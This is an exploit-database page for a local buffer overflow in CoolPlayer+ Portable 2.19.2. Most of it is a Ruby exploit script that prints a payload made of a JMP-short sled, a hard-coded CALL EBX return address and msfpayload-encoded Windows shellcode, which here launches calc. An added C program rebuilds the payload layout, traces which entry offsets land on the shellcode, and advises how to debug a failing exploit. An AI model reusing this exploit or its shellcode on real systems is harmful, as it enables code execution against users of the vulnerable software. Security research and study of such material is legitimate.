CoolPlayer+ Portable 2.19.2 Buffer Overflow ASLR Bypass 2

2012-08-06 / 2015-12-26
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/ruby
# Exploit for CoolPlayer+ Portable 2.19.2
#
# Based on exploit by Blake and Dhruval.
# Vulnerability found by Securityxxxpert
# Original: http://www.exploit-db.com/exploits/20262/
#
# This one by Robert Larsen <robert@the-playground.dk>
# Lots of room for shellcode as opposed to original exploit.
# Shellcode created with:
# msfpayload windows/exec CMD=calc R | msfencode -b '\x00\x0a\x0c'

# 223 bytes, windows/exec CMD=calc, encoded to avoid \x00, \x0a and \x0c
SHELLCODE =
"\xda\xd6\xd9\x74\x24\xf4\xb8\x3a\xbd\x65\xf7\x5e\x31\xc9" +
"\xb1\x32\x31\x46\x17\x03\x46\x17\x83\xd4\x41\x87\x02\xd4" +
"\x52\xc1\xed\x24\xa3\xb2\x64\xc1\x92\xe0\x13\x82\x87\x34" +
"\x57\xc6\x2b\xbe\x35\xf2\xb8\xb2\x91\xf5\x09\x78\xc4\x38" +
"\x89\x4c\xc8\x96\x49\xce\xb4\xe4\x9d\x30\x84\x27\xd0\x31" +
"\xc1\x55\x1b\x63\x9a\x12\x8e\x94\xaf\x66\x13\x94\x7f\xed" +
"\x2b\xee\xfa\x31\xdf\x44\x04\x61\x70\xd2\x4e\x99\xfa\xbc" +
"\x6e\x98\x2f\xdf\x53\xd3\x44\x14\x27\xe2\x8c\x64\xc8\xd5" +
"\xf0\x2b\xf7\xda\xfc\x32\x3f\xdc\x1e\x41\x4b\x1f\xa2\x52" +
"\x88\x62\x78\xd6\x0d\xc4\x0b\x40\xf6\xf5\xd8\x17\x7d\xf9" +
"\x95\x5c\xd9\x1d\x2b\xb0\x51\x19\xa0\x37\xb6\xa8\xf2\x13" +
"\x12\xf1\xa1\x3a\x03\x5f\x07\x42\x53\x07\xf8\xe6\x1f\xa5" +
"\xed\x91\x7d\xa3\xf0\x10\xf8\x8a\xf3\x2a\x03\xbc\x9b\x1b" +
"\x88\x53\xdb\xa3\x5b\x10\x13\xee\xc6\x30\xbc\xb7\x92\x01" +
"\xa1\x47\x49\x45\xdc\xcb\x78\x35\x1b\xd3\x08\x30\x67\x53" +
"\xe0\x48\xf8\x36\x06\xff\xf9\x12\x65\x9e\x69\xfe\x6a"

# Layout: 232 bytes of "jmp short +0x4e" (each hop lands 80 bytes further on,
# so 0 -> 80 -> 160 -> 240), then the overwritten return address, then 4 junk
# bytes, then the shellcode at offset 240. The last hop skips over the
# address and the junk and lands exactly on the shellcode.
payload = "\xeb\x4e" * (232 / 2) + # JMP 80
          "\x5d\xec\xf8\x77" +     # CALL EBX (0x77f8ec5d, little-endian)
          "\x90\x90\x90\x90" +     # Junk
          SHELLCODE

puts payload
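The sled geometry in the script above, worked through as an added example (this is not the page's or the exploit author's code): a C program that rebuilds the same byte layout (232 bytes of `\xeb\x4e`, the 4-byte CALL EBX address, 4 junk bytes) with a constructed 0xCC stand-in for the shellcode, then traces where execution lands for a given entry offset. The tracer is an assumption of mine, not a disassembler: it decodes only the two byte patterns the sled actually contains, `EB rel8` (jmp short) and a lone `4E` (which x86 executes as the one-byte DEC ESI when control enters at an odd offset), and stops at the first byte that is anything else.

```c
/* Trace the JMP-short sled from the CoolPlayer+ exploit: which entry offsets
 * reach the shellcode?  Added example; layout constants are from the page,
 * the tracer and the 0xCC shellcode stand-in are constructed for this demo. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SLED_LEN  232                              /* "\xeb\x4e" * (232 / 2) */
#define RET_LEN   4                                /* "\x5d\xec\xf8\x77"     */
#define JUNK_LEN  4                                /* "\x90\x90\x90\x90"     */
#define SC_OFFSET (SLED_LEN + RET_LEN + JUNK_LEN)  /* 240: shellcode start   */
#define SC_LEN    16                               /* constructed stand-in   */
#define BUF_LEN   (SC_OFFSET + SC_LEN)

static uint8_t payload[BUF_LEN];

/* Build the byte layout the Ruby script emits.  0xCC (int3) replaces the
 * encoded shellcode so a trace stops as soon as it arrives there. */
static size_t build_payload(uint8_t *buf, size_t cap)
{
    if (cap < BUF_LEN) return 0;
    for (size_t i = 0; i < SLED_LEN; i += 2) {
        buf[i]     = 0xeb;   /* jmp short rel8                               */
        buf[i + 1] = 0x4e;   /* rel8 = +78, so the target is 80 bytes ahead   */
    }
    memcpy(buf + SLED_LEN, "\x5d\xec\xf8\x77", RET_LEN);   /* CALL EBX addr */
    memset(buf + SLED_LEN + RET_LEN, 0x90, JUNK_LEN);
    memset(buf + SC_OFFSET, 0xcc, SC_LEN);
    return BUF_LEN;
}

/* Single-step only the opcodes the sled is made of: EB rel8 and a lone 4E
 * (DEC ESI, one byte).  Returns the first offset holding any other byte,
 * or -1 if control leaves the buffer or loops. */
static long trace_entry(const uint8_t *buf, size_t len, size_t entry, int *hops)
{
    long pc = (long)entry;
    int h = 0;
    while (pc >= 0 && pc < (long)len) {
        uint8_t op = buf[pc];
        if (op == 0xeb) {
            if (pc + 1 >= (long)len) return -1;
            pc = pc + 2 + (int8_t)buf[pc + 1];
            if (++h > 64) return -1;            /* guard against a jmp loop */
        } else if (op == 0x4e) {
            pc += 1;
        } else {
            if (hops) *hops = h;
            return pc;
        }
    }
    return -1;
}

/* Where execution ends up if EBX points `entry` bytes into the buffer. */
long sled_landing(size_t entry)
{
    build_payload(payload, sizeof payload);
    return trace_entry(payload, sizeof payload, entry, NULL);
}

/* How many of the SLED_LEN possible entry offsets land exactly on the shellcode. */
int good_entry_count(void)
{
    int good = 0;
    build_payload(payload, sizeof payload);
    for (size_t e = 0; e < SLED_LEN; e++)
        if (trace_entry(payload, sizeof payload, e, NULL) == SC_OFFSET) good++;
    return good;
}

int main(void)
{
    size_t probes[] = { 0, 1, 2, 79, 80, 152, 160, 231 };
    build_payload(payload, sizeof payload);
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        int hops = 0;
        long land = trace_entry(payload, sizeof payload, probes[i], &hops);
        const char *what = land == SC_OFFSET ? "shellcode"
                         : (land >= SLED_LEN && land < SC_OFFSET) ? "return address / junk bytes"
                         : "misaligned";
        printf("entry %3zu -> offset %3ld after %d jmp(s)  (%s)\n",
               probes[i], land, hops, what);
    }
    printf("%d of %d entry offsets reach the shellcode\n", good_entry_count(), SLED_LEN);
    return 0;
}
```

The trace shows what the "JMP 80" comment implies but does not spell out: the chain 0 -> 80 -> 160 -> 240 only reaches the shellcode from entry offsets 0, 80 and 160 (plus 79 and 159, where the stray `4E` is consumed as DEC ESI first). Any other even entry lands two or more bytes into the encoder stub, and offsets 152 to 231 land on the stored return-address bytes instead. So this payload is not a conventional NOP sled; it depends on EBX pointing at the very start of the buffer when CALL EBX executes, which is worth confirming in a debugger before blaming bad characters when the exploit fails.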

References:

http://www.exploit-db.com/exploits/20262/


Copyright 2024, cxsecurity.com